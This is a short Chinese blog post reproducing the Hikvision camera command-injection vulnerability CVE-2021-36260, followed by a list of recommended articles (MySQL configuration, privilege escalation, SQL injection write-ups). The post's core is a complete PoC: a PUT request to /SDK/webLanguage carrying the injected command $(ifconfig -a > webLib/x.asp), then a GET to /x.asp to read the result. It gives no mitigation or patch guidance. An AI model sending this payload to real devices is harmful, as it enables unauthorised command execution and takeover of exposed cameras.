HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

已于 2023-01-29 19:40:17 修改
阅读量7.4k 收藏 3
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全
于 2023-01-27 00:12:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47533648/article/details/128768617
版权
博客提及页面及成果相关内容,还提到了GET访问/x.asp,涉及信息技术中网络访问方面的信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2023年将会持续于B站、优快云等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。

页面:

在这里插入图片描述

POC:
PUT /SDK/webLanguage HTTP/1.1
Host: 192.168.0.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: language=zh
Upgrade-Insecure-Requests: 1
Content-Length: 102

<?xml version='1.0'encoding='UTF-8'?>
  <language>
     $(ifconfig -a > webLib/x.asp)
  </language>

成果

GET访问/x.asp
在这里插入图片描述

如何查找 MySQL配置文件 my.inimy.conf)的位置(案例篇)
热门推荐
草巾冒小子的博客
01-07 1万+
如何查找 MySQL配置文件 my.inimy.conf)的位置(案例篇) MySQL配置文件说明:【系统不同,后缀有区别】 MySQL配置文件在Windows下叫my.ini,在MySQL安装根目录下; 在Linux下叫my.cnf,该文件位于/etc/my.cnf ,如下图截图说明 ???? 1。 个人备注:不显示文件类型时,my.ini 文件名就叫作 my, 文件属性才显示 ini。 找到 my 文件看属性就知道是不是my.inimysql 查找配置文件 my.ini 位置方法
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 1510
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
mysqlmy.ini配置
09-12
mysqlmy.ini配置文件 my.ini配置
MySQL配置my.ini文件
最新发布
web15285868498的博客
03-05 1657
my.ini文件中存储了数据库的文件地址,数据库数据存储地址以及登录密码等基础信息。sc delete mysql(注意,这里的mysql是你的数据库服务名称,不知道怎么看的win+R后输入services.msc回车,就能在名称那一列找到你的mysql名称)显示成功后在管理(win+R回车后输入services.msc,回车)里看一下,如果数据库在管理中仍然存在,右键选择停止。数据库在管理中消失。我的mysql目录下不允许生成新文件,所以我在别的地方新建my.ini,编辑好后直接复制到存放的目录下。
MySQL my.ini 配置文件
03-14
MySQL my.ini Windows Server 2008 R2 4核八线程 16G
MySQL my.ini 配置文件(配置说明及优化建议)
09-02
MySQL ini 初始化配置文件 配置环境:Windows Server 2008 R2 4核八线程 16G 具体可残酷配置说明及优化建议修改
my.ini 文件配置
wdwwx的博客
06-17 3280
以下是 MySQL 配置文件 my.ini 中常见的配置参数及其详细解释。这些参数可以根据需要进行调整,以优化 MySQL 数据库的性能和行为。
mySQL优化, my.ini 配置说明
weixin_33851177的博客
12-02 303
[mysqld]port = 3306serverid = 1 socket = /tmp/mysql.sock skip-name-resolve       #禁止MySQL对外部连接进行DNS解析skip-grant-tables#禁止MySQL对外部连接进行DNS解析,使用这一选项可以消除MySQL进行DNS解析的时间。但需要注意,如果开启该选项,则所有远程主机连接授权都要使用IP地址方...
mysql配置my.ini文件
11-27
最新mysql压缩包已经没有my.ini文件,但是ini文件对于mysql是必不可少的,如果不想自己去写的话,此可以帮到你
mysql配置文件my.ini
10-24
mysql安装,中没有my.ini。但是我们需要更改数据库的编码集时。就需要my.ini,本人提供一个。下载下来就可以使用。只需要更改default-character-set=(你要设置的编码集)即可。
my.ini(mySql配置文件)
07-03
之前在安装mySql的时候经常出错,主要就是这个文件里面的东西容易出错还不容易修改,即使找到错了,也不容易修改过来,当完成的时候,就想这个文件分享出来,里面最需要注意的就是那个地址,要填到解压的mqlSql的文件路径
mysql 数据库 my.ini 配置文件
03-21
MySQL 数据库 my.ini 配置文件 。以及MySQL 安装步骤以及使用说明。创建数据库,修改密码
mysql- my.ini配置(mysq5.6.10)
02-23
mysql- my.ini配置(mysq5.6.10),供大家一起共同分享使用。
mysqlmy.ini配置文件
05-11
安装解压mysql启动报错缺少的my.ini文件,放在mysql目录底下,与bin和data目录并排
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4868
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
渗透测试 2 --- XSS、CSRF、文件上传、文件包、反序列化漏洞
墨鱼菜鸡
07-11 3549
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
命令执行各种姿势总结
weixin_48427966的博客
04-24 1937
一、绕过if(!eval($c);web30。
mysql8.0创建My.ini
04-28
MySQL 8.0 中,My.ini 文件已经被重命名为 my.cnf 文件,因此你需要创建 my.cnf 文件来配置 MySQL。 下面是在 Windows 上创建 my.cnf 文件的步骤: 1.MySQL 安装目录下创建一个新的文件夹,命名为 my.cnf.d。 2.my.cnf.d 文件夹中创建一个新的文本文件,命名为 my.cnf。 3. 打开 my.cnf 文件,将以下内容复制并粘贴到文件中: ``` [mysql] default-character-set=utf8mb4 [mysqld] basedir=C:/Program Files/MySQL/MySQL Server 8.0 datadir=C:/ProgramData/MySQL/MySQL Server 8.0/Data port=3306 character-set-server=utf8mb4 default-authentication-plugin=mysql_native_password ``` 注意:basedir 和 datadir 参数应该根据你的 MySQL 安装路径进行调整。 4. 保存 my.cnf 文件。 完成上述步骤后,你就成功地创建了 my.cnf 文件,并且可以使用它来配置 MySQL 8.0。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值